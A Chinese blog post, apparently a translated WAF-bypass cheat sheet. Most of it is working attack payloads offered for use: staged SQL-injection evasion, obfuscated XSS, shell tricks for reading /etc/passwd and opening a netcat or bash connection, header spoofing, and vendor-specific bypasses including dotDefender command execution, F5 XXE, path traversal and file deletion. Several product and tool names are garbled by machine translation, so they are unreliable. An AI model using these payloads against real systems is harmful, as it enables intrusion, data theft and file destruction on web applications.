关于一次面试题的记录(二)

本文最后更新于1585天前，其中的信息可能已经有所发展或是发生改变。

模糊词典

1.秘书/模糊化

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing

2.Fuzz-DB /攻击

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack

3.Other Payloads可能会被ban ip，小心为妙。

https://github.com/foospidy/payloads

0X01正则绕过

多少waf使用正则匹配。

黑名单检测/旁路

案例：SQL注入

• 步骤1：

过滤关键词: and, or, union

可能正则: preg_match('/(and|or|union)/i', $id)

被拦截的语句: union select user, password from users

bypass语句: 1 || (select user from users where user_id = 1) = 'admin'

• 第2步：

过滤关键词: and, or, union, where

被拦截的语句: 1 || (select user from users where user_id = 1) = 'admin'

bypass语句: 1 || (select user from users limit 1) = 'admin'

•步骤3：

过滤关键词: and, or, union, where, limit

被拦截的语句: 1 || (select user from users limit 1) = 'admin'

bypass语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

• 步骤4：

过滤关键词: and, or, union, where, limit, group by

被拦截的语句: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

bypass语句: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

•步骤5：

过滤关键词: and, or, union, where, limit, group by, select

被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1

bypass语句: 1 || 1 = 1 into outfile 'result.txt'

bypass语句: 1 || substr(user,1,1) = 'a'

•步骤6：

过滤关键词: and, or, union, where, limit, group by, select, '

被拦截的语句: 1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1

bypass语句: 1 || user_id is not null

bypass语句: 1 || substr(user,1,1) = 0x61

bypass语句: 1 || substr(user,1,1) = unhex(61)

•步骤7：

过滤关键词: and, or, union, where, limit, group by, select, ', hex

被拦截的语句: 1 || substr(user,1,1) = unhex(61)

bypass语句: 1 || substr(user,1,1) = lower(conv(11,10,36))

•步骤8：

过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr

被拦截的语句: 1 || substr(user,1,1) = lower(conv(11,10,36))

bypass语句: 1 || lpad(user,7,1)

•步骤9：

过滤关键词: and, or, union, where, limit, group by, select, ', hex, substr, white space

被拦截的语句: 1 || lpad(user,7,1)

bypass语句: 1%0b||%0blpad(user,7,1)

0X02改进/编码

1.大小写

标准: <script>alert()</script>

Bypassed: <ScRipT>alert()</sCRipT>

标准: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'

Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL编码

被阻断语句: <svG/x=">"/oNloaD=confirm()//

Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

被阻断语句: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)

Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode编码

标准: <marquee onstart=prompt()>

混淆: <marquee onstart=\u0070r\u06f\u006dpt()>

被阻断语句: /?redir=http://google.com

Bypassed: /?redir=http://google。com (Unicode 替代)

被阻断语句: <marquee loop=1 onfinish=alert()>x

Bypassed: ＜marquee loop＝1 onfinish＝alert︵1)>x (Unicode 替代)

TIP: 查看这些说明 this and this reports on HackerOne. 🙂

4. HTML实体编码

标准: "><img src=x onerror=confirm()>

Encoded: "><img src=x onerror=confirm()> (General form)

Encoded: "><img src=x onerror=confirm()> (Numeric reference)

5.混合编码

Sometimes, WAF rules often tend to filter out a specific type of encoding.

This type of filters can be bypassed by mixed encoding payloads.

Tabs and newlines further add to obfuscation.

擅长：

<A HREF="h

tt p://6 6.000146.0x7.147/">XSS</A>

7.双重URL编码

这个需要服务端多次解析了url编码

标准: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\

混淆: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

标准: <script>alert()</script>

混淆: %253Cscript%253Ealert()%253C%252Fscript%253E

8.通配符使用

用于linux命令语句注入，通过shell通配符绕过

标准: /bin/cat /etc/passwd

混淆: /???/??t /???/??ss??

Used chars: / ? t s

标准: /bin/nc 127.0.0.1 1337

混淆: /???/n? 2130706433 1337

Used chars: / ? n [0-9]

9.动态有效载荷生成

标准: <script>alert()</script>

混淆: <script>eval('al'+'er'+'t()')</script>

标准: /bin/cat /etc/passwd

混淆: /bi'n'''/c''at' /e'tc'/pa''ss'wd

Bash allows path concatenation for execution.

标准: <iframe/onload='this["src"]="javascript:alert()"';>

混淆: <iframe/onload='this["src"]="jav"+"as&Tab;cr"+"ipt:al"+"er"+"t()"';>

9.垃圾字符

Normal payloads get filtered out easily.

Adding some junk chars helps avoid detection (specific cases only).

They often help in confusing regex based firewalls.

标准: <script>alert()</script>

混淆: <script>+-+-1-+-+alert(1)</script>

标准: <BODY onload=alert()>

混淆: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert()>

注意： 上述语句可能会破坏正则的匹配，达到绕过。

标准: <a href=javascript;alert()>ClickMe

Bypassed: <a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=j&#97v&#97script:&#97lert(1)>ClickMe

10.插入换行符

部分waf可能会对换行符没有匹配

标准: <iframe src=javascript:confirm(0)">

混淆: <iframe src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(0)">

11.未定义变量

bash 和 perl 执行脚本中加入未定义变量，干扰正则。

提示： 随便写一个不存在的变量就好。$aaaa,$sdayuhjbsad,$dad2ed都可以。

Level 1 Obfuscation: Normal

标准: /bin/cat /etc/passwd

混淆: /bin/cat$u /etc/passwd$u

Level 2 Obfuscation: Postion Based

标准: /bin/cat /etc/passwd

混淆: $u/bin$u/cat$u $u/etc$u/passwd$u

Level 3 Obfuscation: Random characters

标准: /bin/cat /etc/passwd

混淆: $aaaaaa/bin$bbbbbb/cat$ccccccc $dddddd/etc$eeeeeee/passwd$fffffff

一个精心制作的payload

$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf

12. Tab键和换行符

大多数waf匹配的是空格不是Tab

标准: <IMG SRC="javascript:alert();">

Bypassed: <IMG SRC=" javascript:alert();">

变形: <IMG SRC=" jav ascri pt:alert ();">

标准: http://test.com/test?id=1 union select 1,2,3

标准: http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3

标准: <iframe src=javascript:alert(1)></iframe>

混淆:

13. Token Breakers（翻译不了看起来说的就是sql注入封闭）

Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.

Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.

However, the request must still remain valid while using token-breakers.

Case: Unknown Token for the Tokenizer

Payload: ?id=‘-sqlite_version() UNION SELECT password FROM users --

Case: Unknown Context for the Parser (Notice the uncontexted bracket)

Payload 1: ?id=123);DROP TABLE users --

Payload 2: ?id=1337) INTO OUTFILE ‘xxx’ --

提示： 更多payload可以看这里备忘单。

14.其他格式纠正

许多web应用程序支持不同的编码类型(如下表)

混淆成服务器可解析、waf不可解析的编码类型

案例： IIS

IIS6, 7.5, 8 and 10 (ASPX v4.x) 允许 IBM037 字符

可以发送编码后的参数名和值

原始请求：

POST /sample.aspx?id1=something HTTP/1.1

HOST: victim.com

Content-Type: application/x-www-form-urlencoded; charset=utf-8

Content-Length: 41

id2='union all select * from users--

突破请求+ URL编码：

POST /sample.aspx?%89%84%F1=%A2%96%94%85%A3%88%89%95%87 HTTP/1.1

HOST: victim.com

Content-Type: application/x-www-form-urlencoded; charset=ibm037

Content-Length: 115

%89%84%F2=%7D%A4%95%89%96%95%40%81%93%93%40%A2%85%93%85%83%A3%40%5C%40%86%99%96%94%40%A4%A2%85%99%A2%60%60

提示： 可以使用这个小脚本来转化编码

import urllib.parse, sys

from argparse import ArgumentParser

lackofart = '''

OBFUSCATOR

'''

def paramEncode(params="", charset="", encodeEqualSign=False, encodeAmpersand=False, urlDecodeInput=True, urlEncodeOutput=True):

result = ""

equalSign = "="

ampersand = "&"

if '=' and '&' in params:

if encodeEqualSign:

equalSign = equalSign.encode(charset)

if encodeAmpersand:

ampersand = ampersand.encode(charset)

params_list = params.split("&")

for param_pair in params_list:

param, value = param_pair.split("=")

if urlDecodeInput:

param = urllib.parse.unquote(param)

value = urllib.parse.unquote(value)

param = param.encode(charset)

value = value.encode(charset)

if urlEncodeOutput:

param = urllib.parse.quote_plus(param)

value = urllib.parse.quote_plus(value)

if result:

result += ampersand

result += param + equalSign + value

else:

if urlDecodeInput:

params = urllib.parse.unquote(params)

result = params.encode(charset)

if urlEncodeOutput:

result = urllib.parse.quote_plus(result)

return result

def main():

print(lackofart)

parser = ArgumentParser('python3 obfu.py')

parser._action_groups.pop()

# A simple hack to have required arguments and optional arguments separately

required = parser.add_argument_group('Required Arguments')

optional = parser.add_argument_group('Optional Arguments')

# Required Options

required.add_argument('-s', '--str', help='String to obfuscate', dest='str')

required.add_argument('-e', '--enc', help='Encoding type. eg: ibm037, utf16, etc', dest='enc')

# Optional Arguments (main stuff and necessary)

optional.add_argument('-ueo', help='URL Encode Output', dest='ueo', action='store_true')

optional.add_argument('-udi', help='URL Decode Input', dest='udi', action='store_true')

args = parser.parse_args()

if not len(sys.argv) > 1:

parser.print_help()

quit()

print('Input: %s' % (args.str))

print('Output: %s' % (paramEncode(params=args.str, charset=args.enc, urlDecodeInput=args.udi, urlEncodeOutput=args.ueo)))

if __name__ == '__main__':

main()

服务器信息	可用编码	说明
Nginx，uWSGI-Django-Python3	IBM037，IBM500，cp875，IBM1026，IBM273	对参数名和参数值进行编码服务器对参数名称和参数值均进行URL解码需要对等号和＆和进行编码（不进行URL编码）
Nginx，uWSGI-Django-Python2	IBM037，IBM500，cp875，IBM1026，utf-16，utf-32，utf-32BE，IBM424	对参数名和参数值进行便慢慢地对服务器参数进行参数名和参数值均进行的URL解码等号和＆符号不应该以任何方式编码。
Apache-TOMCAT8-JVM1.8-JSP	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM290，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025	参数名按原始格式（可以像往常一样使用url编码）正文不管是否通过url编码对齐等号和＆符号不应该以任何方式编码
Apache-TOMCAT7-JVM1.6-JSP	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，utf-32，utf-32BE，IBM273，IBM277，IBM278，IBM280， IBM284，IBM285，IBM297，IBM420，IBM424，IBM-Thai，IBM871，cp1025	参数名按原始格式（可以像往常一样使用url编码）正文不管是否通过url编码对齐等号和＆符号不应该以任何方式编码
IIS6、7.5、8、10 -ASPX（v4.x）	IBM037，IBM500，IBM870，cp875，IBM1026，IBM01047，IBM01140，IBM01141，IBM01142，IBM01143，IBM01144，IBM01145，IBM01146，IBM01147，IBM01148，IBM01149，utf-16，unicodeFFFE，utf-32，utf-32BE，IBM273，IBM277， IBM278，IBM280，IBM284，IBM285，IBM290，IBM297，IBM420，IBM423，IBM424，x-EBCDIC-KoreanExtended，IBM-Thai，IBM871，IBM880，IBM905，IBM00924，cp1025	参数名按原始格式（可以像往常一样使用url编码）正文不管是否通过url编码对齐等号和＆符号不应该以任何方式编码

0X04 HTTP参数污染

手法

这种攻击方法基于服务器如何解释具有相同名称的参数

可能造成bypass的情况:

服务器使用最后接收到的参数，WAF只检查第一个参数

服务器将来自类似参数的值联合起来，WAF单独检查它们

下面是相关服务器对参数解释的比较

环境	参数解析	示例
ASP / IIS	用逗号连接	par1 = val1，val2
JSP，Servlet / Apache Tomcat	第一个参数是结果	par1 = val1
ASP.NET/IIS	用逗号连接	par1 = val1，val2
PHP /宙斯	最后一个参数是结果	par1 = val2
PHP / Apache	最后一个参数是结果	par1 = val2
JSP，Servlet /码头	第一个参数是结果	par1 = val1
IBM Lotus Domino	第一个参数是结果	par1 = val1
IBM HTTP服务器	最后一个参数是结果	par1 = val2
mod_perl，libapeq2 / Apache	第一个参数是结果	par1 = val1
Oracle应用服务器10G	第一个参数是结果	par1 = val1
Perl CGI / Apache	第一个参数是结果	par1 = val1
Python / Zope	第一个参数是结果	par1 = val1
爱思华宝	返回一个列表	['val1'，'val2']
AXIS 2400	最后一个参数是结果	par1 = val2
DBMan	由两个波浪号连接起来	par1 = val1 ~~ val2
mod-wsgi（Python）/ Apache	返回一个列表	阵列（0x8b9058c）

0X05浏览器的缺陷

字符集错误：

可以尝试修改 charset header to 更高的 Unicode (eg. UTF-32)

当网站解码的时候，触发payload

请求示例：

GET /page.php?p=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1

Host: site.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0

Accept-Charset:utf-32; q=0.5<

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

当站点加载时，将其编码为我们设置的UTF-32编码，然后通过页面的输出编码为UTF-8，将其呈现为："<script>alert (1) </ script> 从而触发xss

完整url编码后的有效载荷：

%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

空字节

空字节通常使用字符串终止符

Payload 示例:

<scri%00pt>alert(1);</scri%00pt>

<scri\x00pt>alert(1);</scri%00pt>

<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>

标准: <a href="javascript:alert()">

混淆: <a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>

变形: <a 0x00 href="javascript:alert(1)">clickme</a>

解析错误

RFC 声明节点名不可以由空白起始

但是我们可以使用特殊字符 ` %, //, !, ?`, etc.

例子:

<// style=x:expression\28write(1)\29> - Works upto IE7 (Source)

- Works upto IE9 (Reference)

<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/> - Works in IE7 (Reference)

<%div%20style=xss:expression(prompt(1))> - Works Upto IE7

Unicode分隔符

每个浏览器有不同的分隔分隔符

@Masato Kinugawafuzz后发现如下

IExplorer: 0x09, 0x0B, 0x0C, 0x20, 0x3B

Chrome: 0x09, 0x20, 0x28, 0x2C, 0x3B

Safari: 0x2C, 0x3B

FireFox: 0x09, 0x20, 0x28, 0x2C, 0x3B

Opera: 0x09, 0x20, 0x2C, 0x3B

Android: 0x09, 0x20, 0x28, 0x2C, 0x3B

示例

<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d

使用其他非典型等效语法结构替换

找的waf开发人员没有注意到的语句进行攻击

一些WAF开发人员忽略的常见关键字：

JavaScript函数：
window
parent
this
self
标签属性：
onwheel
ontoggle
onfilterchange
onbeforescriptexecute
ondragstart
onauxclick
onpointerover
srcdoc

SQL运算符

lpad

lpad( string, padded_length, [ pad_string ] ) lpad函数从左边对字符串使用指定的字符进行填充

lpad('tech', 7); 将返回' tech'

lpad('tech', 2); 将返回'te'

lpad('tech', 8, '0'); 将返回'0000tech'

lpad('tech on the net', 15, 'z'); 将返回'tech on the net'

lpad('tech on the net', 16, 'z'); 将返回'ztech on the net

field

FIELD(str,str1,str2,str3,...)

返回的索引（从1开始的位置）的str在str1，str2，STR3，...列表中。如果str没有找到，则返回0。

+---------------------------------------------------------+

| FIELD('ej', 'Hej', 'ej', 'Heja', 'hej', 'foo') |

+---------------------------------------------------------+

| 2 |

+---------------------------------------------------------+

bit_count 二进制数中包含1的个数。BIT_COUNT（10）;因为10转成二进制是1010，所以该结果就是2

示例有效载荷：

Case: XSS

Case: SQLi

SELECT if(LPAD(' ',4,version())='5.7',sleep(5),null);

1%0b||%0bLPAD(USER,7,1)

可以使用许多替代原生JavaScript的方法:

JSFuck

JJEncode

XChars.JS

滥用SSL / TLS密码：

很多时候，服务器可以接收各种SSL/TLS密码和版本的连接。

初始化到waf不支持的版本

找出waf支持的密码(通常WAF供应商文档对此进行了讨论)。

找出服务器支持的密码(SSLScan这种工具可以帮助到你)。

找出服务器支持但waf不支持的

工具：滥用SSL旁路

滥用DNS记录：

找到云waf后的源站

提示： 一些在线资源IP历史记录和DNS跟踪

工具：绕过DNS历史记录的防火墙

bash bypass-firewalls-by-DNS-history.sh -d <target> --checkall

请求头欺骗

让waf以为请求来自于内部网络，而不进行进行过滤。

添加如下请求头

X-Originating-IP: 127.0.0.1

X-Forwarded-For: 127.0.0.1

X-Remote-IP: 127.0.0.1

X-Remote-Addr: 127.0.0.1

X-Client-IP: 127.0.0.1

Google Dorks方法：

应对已知WAF的绕过

搜索语法：

普通搜索：

+<wafname> waf bypass

搜索特定的版本漏洞：

"<wafname> <version>" (bypass|exploit)

对于特定类型的绕过漏洞利用：

"<wafname>" +<bypass type> (bypass|exploit)

在漏洞利用数据库上：

site:exploit-db.com +<wafname> bypass

在0Day Inject0r DB上：

site:0day.today +<wafname> <type> (bypass|exploit)

在Twitter上：

site:twitter.com +<wafname> bypass

在Pastebin上

site:pastebin.com +<wafname> bypass

0X06拓展绕过姿势

气锁埃尔贡

SQLi Overlong UTF-8 Sequence Bypass (>= v4.2.4) by @Sec Consult

%C0%80'+union+select+col1,col2,col3+from+table+--+

AWS

SQLi绕过@enkaskal

"; select * from TARGET_TABLE --

XSS Bypass by @kmkz

梭子鱼

@WAFNinja的跨站点脚本

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">

@ Global-Evolution的HTML注入

GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US

Host: favoritewaf.com

User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

XSS绕过@ 0xInfection

<a href=j%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At:open()>clickhere

Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort

梭子鱼垃圾邮件和病毒防火墙5.1.3-@xort的远程命令执行（Metasploit）

Cerber（WordPress）

HTTP动词篡改@ ed0x21son的用户名枚举保护绕过

POST host.com HTTP/1.1

Host: favoritewaf.com

User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)

author=1

受保护的管理脚本绕过@ ed0x21son

http://host/wp-admin///load-scripts.php?load%5B%5D=jquery-core,jquery-migrate,utils

http://host/wp-admin///load-styles.php?load%5B%5D=dashicons,admin-bar

REST API通过@ ed0x21son禁用绕过

http://host/index.php/wp-json/wp/v2/users/

思杰NetScaler

@BGA Security通过HTTP参数污染（NS10.5）进行的SQLi

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">

<soapenv:Header/>

<soapenv:Body>

<string>’ union select current_user, 2#</string>

</soapenv:Body>

</soapenv:Envelope>

generic_api_call.pl XSS by @NNPoster

http://host/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e

Cloudflare

HTML注入@spyerror

<div style="background:url(/f#oo/;color:red/*/foo.jpg);">X

XSS绕过@ c0d3g33k

<a+HREF='javascrip%26%239t:alert%26lpar;document.domain)'>test</a>

XSS绕过@Bohdan Korzhynskyi

xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>

1'"><img/src/onerror=.1|alert``>

XSS绕过@ RakeshMane10

XSS绕过@ArbazKiraak

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`

XSS绕过@AhmetÜmit

<--`<img/src=` onerror=confirm``> --!>

XSS绕过@Shiva Krishna

javascript:{alert`0`}

XSS绕过@Brute Logic

<base href=//knoxss.me?

@ RenwaX23的XSS绕过（仅Chrome）

<j id=x style="-webkit-user-modify:read-write" onfocus={window.onerror=eval}throw/0/+name>H</j>#x

RCE有效负载检测绕过@theMiddle

cat$u+/etc$u/passwd$u

/bin$u/bash$u <ip> <port>

";cat+/etc/passwd+#

科莫多

XSS绕过@ 0xInfection

<p/ondragstart=%27confirm(0)%27.replace(/.+/,eval)%20draggable=True>dragme

@WAFNinja编写的SQLi

0 union/**/select 1,version(),@@datadir

点防御者

@ hyp3rlinx通过（v5.0）禁用防火墙

PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+

<enabled>false</enabled>

@John Dos的远程命令执行（v3.8-5）

POST /dotDefender/index.cgi HTTP/1.1

Host: 172.16.159.132

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Authorization: Basic YWRtaW46

Cache-Control: max-age=0

Content-Type: application/x-www-form-urlencoded

Content-Length: 95

sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al ../;pwd;&action=deletesite&linenum=15

@EnableSecurity的持久XSS（v4.0）

GET /c?a=<script> HTTP/1.1

Host: 172.16.159.132

User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;

rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

R-XSS绕过@WAFNinja

XSS绕过@ 0xInfection

<p draggable=True ondragstart=prompt()>alert

<bleh/ondragstart=&Tab;parent&Tab;['open']&Tab;()%20draggable=True>dragme

GET - XSS Bypass (v4.02) by @DavidK

/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E

<img src="WTF" onError="{var

{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B

h%2Bn)(/0wn3d/.source)" />

POST-@DavidK的XSS绕过（v4.02）

<img src="WTF" onError="{var

{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/

.source)" />

clave XSS (v4.02) by @DavidK

/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{

Fortinet Fortiweb

pcre_expression @Benjamin Mejri验证的XSS

/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C

/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0

CSP绕过@ Binar10

POST类型查询

POST /<path>/login-app.aspx HTTP/1.1

Host: <host>

User-Agent: <any valid user agent string>

Accept-Encoding: gzip, deflate

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: <the content length must be at least 2399 bytes>

var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>

GET类型查询

http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>

F5 ASM

XSS绕过@WAFNinja

"/><marquee onfinish=confirm(123)>a</marquee>

F5大IP

XSS绕过@WAFNinja

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">

<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">

XSS绕过@Aatif Khan

<div contextmenu="xss">Right-Click Here<menu id="xss"onshow="prom%25%32%33%25%32%36x70;t(1)“>

report_type XSS通过@NNPoster

https://host/dms/policy/rep_request.php?report_type=%22%3E%3Cbody+onload=alert(%26quot%3BXSS%26quot%3B)%3E%3Cfoo+

@Anonymous的基于POST的XXE

POST /sam/admin/vpe2/public/php/server.php HTTP/1.1

Host: bigip

Cookie: BIGIPAuthCookie=*VALID_COOKIE*

Content-Length: 143

<?xml version="1.0" encoding='utf-8' ?>

<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>

@Anastasios Monachos的目录遍历

读取任意文件

/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd

Delete Arbitrary File

POST /tmui/Control/form HTTP/1.1

Host: site.com

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd

Content-Type: application/x-www-form-urlencoded

_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete

F5消防通行证

来自@Anonymous的SQLi绕过

state=%2527+and+

(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+

BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+

ModSecurity

@theMiddle（v3.1）的PL3的RCE有效负载检测绕过

;+$u+cat+/etc$u/passwd$u

@theMiddle（v3.1）的PL2的RCE有效负载检测绕过

;+$u+cat+/etc$u/passwd+\#

@theMiddle（v3.0）的PL1和PL2的RCE有效负载

/???/??t+/???/??ss??

@theMiddle（v3.0）的PL3的RCE有效负载

/?in/cat+/et?/passw?

@Johannes Dahse（v2.2）的SQLi绕过

0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user

@Yuri Goltsev（v2.2）的SQLi绕过

1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')

@Ahmad Maulana（v2.2）的SQLi绕过

1'UNION/*!0SELECT user,2,3,4,5,6,7,8,9/*!0from/*!0mysql.user/*-

SQLi Bypass by @Travis Lee (v2.2)

amUserId=1 union select username,password,3,4 from users

@Roberto Salgado（v2.2）的SQLi绕过

%0Aselect%200x00,%200x41%20like/*!31337table_name*/,3%20from%20information_schema.tables%20limit%201

@Georgi Geshev（v2.2）的SQLi绕过

1%0bAND(SELECT%0b1%20FROM%20mysql.x)

@SQLMap开发人员（v2.2）的SQLi绕过

%40%40new%20union%23sqlmapsqlmap...%0Aselect%201,2,database%23sqlmap%0A%28%29

@HackPlayers（v2.2）的SQLi绕过

%0Aselect%200x00%2C%200x41%20not%20like%2F*%2100000table_name*%2F%2C3%20from%20information_schema.tables%20limit%201

Imperva

Imperva SecureSphere 13-@ rsp3ar的远程命令执行

XSS绕过@David Y

XSS绕过@Emad Shanab

anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxldz

XSS绕过@WAFNinja

%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E

XSS绕过@ i_bo0om

XSS绕过@ c0d3g33k

SQLi绕过@ DRK1WI

15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'

SQLi通过@Giuseppe D'Amore

stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1

